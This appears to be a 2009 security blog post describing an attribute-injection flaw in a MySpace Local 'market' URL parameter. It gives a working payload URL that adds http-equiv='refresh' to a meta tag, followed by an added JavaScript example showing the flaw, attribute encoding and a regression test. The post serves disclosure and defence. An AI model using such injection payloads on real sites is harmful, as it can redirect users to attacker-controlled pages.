Data passed to the vulnerable market field is not HTML-encoded, but tags still cannot be injected: sending a less-than character followed by any alphabetic character redirects the user to what is presumably a security-related error page. By injecting the http-equiv attribute, however, the vulnerable meta tag can be repurposed.
http://local.myspace.com/index.cfm?fuseaction=local.hub&dma=467&market=0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"
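The behaviour described above, as an added example that is not code from the original post: a filter that only refuses `<` followed by a letter lets the `market` value from the URL through, the value closes the quoted attribute and adds `http-equiv`, and attribute-context encoding prevents that. The meta tag template (`name="market"`, `content`) and all function names are assumptions, since the site's real markup is not shown here.

```javascript
// Added example. The meta tag template and all function names are assumptions.
// PAGE_VALUE is the market parameter taken from the URL in the post.
const PAGE_VALUE = '0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"';

// The filter behaviour the post describes: "<" followed by a letter is refused.
function tagFilterBlocks(value) {
  return /<[A-Za-z]/.test(value);
}

// Assumed vulnerable template: value copied unencoded into a quoted attribute.
function renderUnsafe(market) {
  return '<meta name="market" content="' + market + '">';
}

// Hardened template: encode for the HTML attribute context before output.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}
function renderSafe(market) {
  return '<meta name="market" content="' + encodeAttr(market) + '">';
}

// List attribute names in one rendered tag (simple scanner, enough for this check).
function attributeNames(tag) {
  const re = /([^\s"'<>\/=]+)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/g;
  return Array.from(tag.matchAll(re), (m) => m[1].toLowerCase());
}

// Template regression check: attributes that exist only because of the input.
function injectedAttributes(render, value) {
  const baseline = new Set(attributeNames(render('0')));
  return attributeNames(render(value)).filter((n) => !baseline.has(n));
}

console.log('filter blocks page value:', tagFilterBlocks(PAGE_VALUE));
console.log('unsafe template adds:', injectedAttributes(renderUnsafe, PAGE_VALUE));
console.log('safe template adds:  ', injectedAttributes(renderSafe, PAGE_VALUE));
```

The `injectedAttributes` check can run as a template regression test: any input that changes the set of attributes on the rendered tag means the value escaped its attribute.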
Friday, September 4, 2009
Thanks for writing